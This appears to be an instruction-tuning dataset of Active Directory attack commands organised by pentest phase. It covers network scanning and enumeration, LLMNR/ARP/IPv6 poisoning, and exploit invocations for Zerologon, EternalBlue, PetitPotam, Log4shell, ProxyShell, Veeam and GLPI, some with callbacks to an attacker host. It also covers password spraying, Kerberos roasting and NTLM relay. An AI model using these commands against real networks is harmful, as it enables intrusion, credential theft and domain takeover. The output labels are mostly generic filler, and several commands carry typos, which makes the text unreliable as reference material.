instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Scan Network
nxc smb <ip_range>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Scan Network
nmap -sU -sC -sV -oA <output> <ip>
Network/service scan or enumeration command (Nmap) with specified options.
Scan Network
nmap -Pn -sC -sV -p- -oA <output> <ip>
Network/service scan or enumeration command (Nmap) with specified options.
Scan Network
nmap -Pn -sC -sV -oA <output> <ip>
Network/service scan or enumeration command (Nmap) with specified options.
Scan Network
nmap -Pn --script smb-vuln* -p139,445 <ip>
Network/service scan or enumeration command (Nmap) with specified options.
Scan Network
nmap -Pn -sV --top-ports 50 --open <ip>
Network/service scan or enumeration command (Nmap) with specified options.
Scan Network
nmap -sP -p <ip>
Network/service scan or enumeration command (Nmap) with specified options.
Find DC IP
nmap -p 88 --open <ip_range>
Network/service scan or enumeration command (Nmap) with specified options.
Find DC IP
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
Tool or command referenced under 'Find DC IP'.
Find DC IP
nmcli dev show <interface>
Note or procedural step under 'Find DC IP'.
Zone Transfer
dig axfr <domain_name> @<name_server>
Tool or command referenced under 'Zone Transfer'.
Anonymous & Guest access on SMB shares
smbclient -U '%' -L //<ip>
SMB client usage to list or access network shares.
Anonymous & Guest access on SMB shares
enum4linux-ng.py -a -u '' -p '' <ip>
Note or procedural step under 'Anonymous & Guest access on SMB shares'.
Anonymous & Guest access on SMB shares
nxc smb <ip_range> -u 'a' -p ''
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Anonymous & Guest access on SMB shares
nxc smb <ip_range> -u '' -p '
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Enumerate LDAP:
ldapsearch -x -H <dc_ip> -s base
Tool or command referenced under 'Enumerate LDAP:'.
Enumerate LDAP:
nmap -n -sV --script 'ldap*' and not brute -p 389 <dc_ip>
Network/service scan or enumeration command (Nmap) with specified options.
Enumerate Users:
nxc smb <dc_ip> --rid-brute 10000 # bruteforcing RID
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Enumerate Users:
nxc smb <dc_ip> --users
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Enumerate Users:
net rpc group members 'Domain Users' -W '<domain> -l <ip> -U '%'
Note or procedural step under 'Enumerate Users:'.
Bruteforce users:
kerbrute userenum -d <domain> <userlist>
Tool or command referenced under 'Bruteforce users:'.
Bruteforce users:
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<user_list_file>" <dc_ip>
Network/service scan or enumeration command (Nmap) with specified options.
Poisoning:
LLMNR / NBTNS / MDNS
Note or procedural step under 'Poisoning:'.
Poisoning:
responder -l <interface>
Tool or command referenced under 'Poisoning:'.
Poisoning:
DHCPv6 (IPv6 prefered to IPv4)
Note or procedural step under 'Poisoning:'.
Poisoning:
mitm6 -d <domain>
Tool or command referenced under 'Poisoning:'.
Poisoning:
bettercap
Tool or command referenced under 'Poisoning:'.
Poisoning:
ARP Poisoning
Note or procedural step under 'Poisoning:'.
Poisoning:
bettercap
Tool or command referenced under 'Poisoning:'.
Poisoning:
asreqroast
Note or procedural step under 'Poisoning:'.
Poisoning:
Pcredz -i <interface> -v
Note or procedural step under 'Poisoning:'.
Unauthenticated PetitPotam (CVE-2022-26925)
petitpotam.py -d <domain> <listener> <target>
Note or procedural step under 'Unauthenticated PetitPotam (CVE-2022-26925)'.
no password
pxethief.py 1
Note or procedural step under 'no password'.
no password
pxethief.py 2 <distribution_point_ip>
Note or procedural step under 'no password'.
password protected
tftp -i <dp_ip> GET "\xxx\boot.var"
Note or procedural step under 'password protected'.
password protected
pxethief.py 5 '\xxx\boot.var'
Note or procedural step under 'password protected'.
password protected > TimeRoasting
timeroast.py <dc_ip> -o <output_log>
Note or procedural step under 'password protected > TimeRoasting'.
Quick Compromise: > Zerologon (unsafe) CVE-2020-1472
zerologon-scan '<dc_netbios_name>' '<ip>'
Note or procedural step under 'Quick Compromise: > Zerologon (unsafe) CVE-2020-1472'.
Quick Compromise: > Zerologon (unsafe) CVE-2020-1472
cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip>
Note or procedural step under 'Quick Compromise: > Zerologon (unsafe) CVE-2020-1472'.
Eternal Blue MS17-010:
msf> exploit/windows/smb/ms17_010_eternalblue # SMBv1 only
Tool or command referenced under 'Eternal Blue MS17-010:'.
Eternal Blue MS17-010: > Tomcat/Jboss Manager
msf> auxiliary/scanner/http/tomcat_enum
Tool or command referenced under 'Eternal Blue MS17-010: > Tomcat/Jboss Manager'.
Eternal Blue MS17-010: > Tomcat/Jboss Manager
msf> exploit/multi/http/tomcat_mgr_deploy
Tool or command referenced under 'Eternal Blue MS17-010: > Tomcat/Jboss Manager'.
Java RMI:
msf> use exploit/multi/misc/java_rmi_server
Tool or command referenced under 'Java RMI:'.
Java Serialiszed port:
ysoserial.jar <gadget> '<cmd>' |nc <ip> <port>
Note or procedural step under 'Java Serialiszed port:'.
Log4shell:
${jndi:ldap://<ip>:<port>/o=reference}
Note or procedural step under 'Log4shell:'.
Database:
msf> use auxiliary/admin/mssql/mssql_enum_sql_logins
Tool or command referenced under 'Database:'.
Exchange:
Proxyshell
Note or procedural step under 'Exchange:'.
Exchange:
proxyshell_rce.py -u https://<exchange> -e administrator@<domain>
Note or procedural step under 'Exchange:'.
Veeam:
CVE-2023-27532 (creds Veeam backup)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
VeeamHax.exe --target <veeam_server>
Note or procedural step under 'Veeam:'.
Veeam:
CVE-2023-27532 net.tcp:/<target>:<port>/
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-29849 (auth bypass - Veeam Backup Enterprise Manager)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-29849.py --target https://<veeam_ip>:<veeam_port>/ --callback-server <attacker_ip>:<port>
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-29855 (auth bypass - Veeam Recovery Orchestrator)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-29855.py --start_time <start_time_epoch> --end_time <end_time_epoch> --username <user>@<domain> --target https://<veeam_ip>:<veeam_port>/
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-40711 (unserialize - Veeam backup)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Veeam:
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://<attacker_ip>:8000/trigger --targetveeam <veeam_ip>
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
GLPI:
CVE-2022-35914
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
GLPI:
/vendor/htmlawed/htmlawed/htmLawedTest.php
Note or procedural step under 'GLPI:'.
GLPI:
CVE_2023_41320
Note or procedural step under 'GLPI:'.
GLPI:
cve_2023_41320.py -u <user> -p <password> -t <ip>
Note or procedural step under 'GLPI:'.
GLPI: > Weak websites / services
nuclei
Note or procedural step under 'GLPI: > Weak websites / services'.
GLPI: > Weak websites / services
nuclei -target <ip_range>
Note or procedural step under 'GLPI: > Weak websites / services'.
GLPI: > Weak websites / services
nessus
Note or procedural step under 'GLPI: > Weak websites / services'.
Password Spray
Get password policy (you need creds,but you should get the policy first to avoid locking accounts)
Note or procedural step under 'Password Spray'.
Password Spray
default policy
Note or procedural step under 'Password Spray'.
Password Spray
nxc smb <dc_ip> -u '<user>' -p '<password>' -pass-pol
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Password Spray
Get-ADDefaultDomainPasswordPolicy
Note or procedural step under 'Password Spray'.
Password Spray
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> domain_policy
Note or procedural step under 'Password Spray'.
Password Spray
Fined Policy (Privileged)
Note or procedural step under 'Password Spray'.
Password Spray
ldapsearch-ad.py --server <dc> -d <domain> -u <user> -p <pass> --type pass-pol
Tool or command referenced under 'Password Spray'.
Password Spray
Get-ADFineGainedPasswordPolicy -filter *
Note or procedural step under 'Password Spray'.
Password Spray
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> pso # can also be runned with a low priv account but less information will be available
Note or procedural step under 'Password Spray'.
Password Spray
user == password
Note or procedural step under 'Password Spray'.
Password Spray
nxc smb <dc_ip> -u <users.txt> -p <passwords.txt> --no-bruteforce --continue-on-success
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Password Spray
sprayhound -U <users.txt> -d <domain> -dc <dc_ip> # add --lower to lowercase and --upper to uppercase. Add nothing to get only user=pass
Note or procedural step under 'Password Spray'.
Password Spray
usuals passwords (SeasonYear!, Company123, ...)
Note or procedural step under 'Password Spray'.
Password Spray
nxc smb <dc_ip> -u <users.txt> -p <password> --continue-on-success
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Password Spray
sprayhound -U <users.txt> -p <password> -d <domain> -dc <dc_ip>
Note or procedural step under 'Password Spray'.
Password Spray
kerbrute passwordspray -d <domain> <users.txt> <password>
Tool or command referenced under 'Password Spray'.
ASREPRoast
List ASREPRoastable Users (need creds)
Note or procedural step under 'ASREPRoast'.
ASREPRoast
Bloodhound: MATCH (u:User) WHERE u.dontreqpreauth = true AND u.enabled = true RETURN u
Note or procedural step under 'ASREPRoast'.
ASREPRoast
nxc ldap <dc_ip> -u <users.txt> -p '' --asreproast <output.txt>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
ASREPRoast
ASREP roasting
Note or procedural step under 'ASREPRoast'.
ASREPRoast
GetNPUsers.py <domain>/ -usersfile <users.txt> -format hashcat -outputfile <output.txt>
Tool or command referenced under 'ASREPRoast'.
ASREPRoast
nxc ldap <dc_ip> -u <users.txt> -p '' --asreproast <output.txt>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
ASREPRoast
Rubeus.exe asreproast /format:hashcat
Tool or command referenced under 'ASREPRoast'.
ASREPRoast > Blind Kerberoasting
Rubeus.exe keberoast /domain:<domain> /dc:<dcip> /nopreauth: <asrep_user> /spns:<users.txt>
Tool or command referenced under 'ASREPRoast > Blind Kerberoasting'.
ASREPRoast > Blind Kerberoasting
GetUserSPNs.py -no-preauth "<asrep_user>" -usersfile "<user_list.txt>" -dc-host "<dc_ip>" "<domain>"/
Tool or command referenced under 'ASREPRoast > Blind Kerberoasting'.
ASREPRoast > Blind Kerberoasting
CVE-2022-33679
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
ASREPRoast > Blind Kerberoasting
CVE-2022-33679.py <domain>/<user> <target>
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Listen
Respinder -l <interface> #use --lm to force downgrade
Note or procedural step under 'Listen'.
Listen
smbclient.py
SMB client usage to list or access network shares.
NTLM relay
MS-08-068 self relay
Note or procedural step under 'NTLM relay'.
NTLM relay
msf>exploit/windows/smb_smb_relay #windows 2000 / windows 2008 server
Tool or command referenced under 'NTLM relay'.
NTLM relay
smb -> LDAP(S)
Note or procedural step under 'NTLM relay'.
NTLM relay
NTLMv1
Note or procedural step under 'NTLM relay'.
NTLM relay
remove mic (no CVE needed)
Note or procedural step under 'NTLM relay'.
NTLM relay
NTLMv2
Note or procedural step under 'NTLM relay'.
NTLM relay
remove mic (CVE-2019-10140)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.